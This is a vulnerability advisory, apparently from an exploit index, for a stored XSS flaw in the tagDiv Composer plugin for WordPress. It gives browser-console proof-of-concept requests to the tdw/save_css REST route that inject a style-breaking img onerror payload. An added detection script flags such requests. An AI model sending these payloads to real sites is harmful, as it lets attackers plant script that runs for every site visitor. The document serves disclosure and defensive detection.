## https://sploitus.com/exploit?id=WPEX-ID:E6D8216D-ACE4-48BA-AFCA-74DA0DC5ABB5
Before 4.1:
1. Visit Newsmag > Plugins and install and activate "tagDiv Composer"
2. Run the following code in the browser console while logged out:
   ```javascript
   fetch( '/wp-json/tdw/save_css', {
     headers: {
       "Content-Type": "application/x-www-form-urlencoded",
     },
     body: "compiled_css=%3C%2Fstyle%3E%3Cimg%20src%20onerror%3Dalert%28%27XSS%2DChecker%27%29%3E%3Cstyle%3E",
     method: "POST",
   } );
   ```
In version 4.1, exploitable by Admin:
1. Visit Newsmag > Plugins and install and activate "tagDiv Composer"
2. Log in as an admin, and run the following code in a browser console within WP Admin:
   ```javascript
   await wp.apiRequest( { path: 'tdw/save_css', type: 'POST', data: { compiled_css: "</style><img src=x onerror=alert('XSS-Checker')><style>" } } );
   ```
3. Load a frontend page to see the XSS.
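
A detection-side view of the steps above, as an added example that is not part of the original advisory: it triages logged requests to `tdw/save_css`, flagging writes made without a session and `compiled_css` values that would close the surrounding `<style>` element. The record shape (`method`, `url`, `contentType`, `body`, `authenticated`) and the sample records are assumptions constructed for illustration; the `?rest_route=` handling goes beyond the page and covers WordPress's non-pretty-permalink form of the same route.

```javascript
// Added example (not from the advisory): triage logged requests to tdw/save_css.
// The record shape {method, url, contentType, body, authenticated} is an assumption.
const ROUTE = /^\/tdw\/save_css\/?$/;
// "</style" followed by whitespace, "/" or ">" closes a style element, in any letter case.
const STYLE_BREAKOUT = /<\/style[\s\/>]/i;

// Return the REST route from /wp-json/<route> or from ?rest_route=<route>, else null.
function restRoute(url) {
  const u = new URL(url, 'http://site.invalid');
  const fromQuery = u.searchParams.get('rest_route');
  if (fromQuery) return fromQuery;
  const i = u.pathname.indexOf('/wp-json/');
  return i === -1 ? null : u.pathname.slice(i + '/wp-json'.length);
}

// Pull compiled_css out of a JSON or form-encoded body; null when absent or unparsable.
function compiledCss(contentType, body) {
  if (/json/i.test(contentType)) {
    try {
      const v = JSON.parse(body).compiled_css;
      return typeof v === 'string' ? v : null;
    } catch { return null; }
  }
  return new URLSearchParams(body).get('compiled_css');
}

// Returns null for unrelated requests, otherwise a (possibly empty) list of findings.
function inspect(rec) {
  const route = restRoute(rec.url);
  if (rec.method !== 'POST' || route === null || !ROUTE.test(route)) return null;
  const findings = [];
  if (!rec.authenticated) findings.push('unauthenticated-write');
  const css = compiledCss(rec.contentType || '', rec.body || '');
  if (css !== null && STYLE_BREAKOUT.test(css)) findings.push('style-breakout');
  return findings;
}

// Constructed sample records; the first body is the one shown in the steps above.
const SAMPLES = [
  { method: 'POST', url: '/wp-json/tdw/save_css', authenticated: false,
    contentType: 'application/x-www-form-urlencoded',
    body: 'compiled_css=%3C%2Fstyle%3E%3Cimg%20src%20onerror%3Dalert%28%27XSS%2DChecker%27%29%3E%3Cstyle%3E' },
  { method: 'POST', url: '/wp-json/tdw/save_css', authenticated: true,
    contentType: 'application/json',
    body: JSON.stringify({ compiled_css: '.td-example{color:#fff}' }) },
  { method: 'GET', url: '/wp-json/wp/v2/posts', authenticated: false, contentType: '', body: '' },
];
for (const r of SAMPLES) console.log(r.method, r.url, inspect(r));
```

An `unauthenticated-write` finding on a site running a version before 4.1 means the stored CSS should be reviewed; `style-breakout` is worth alerting on in any version, since the value is rendered on frontend pages.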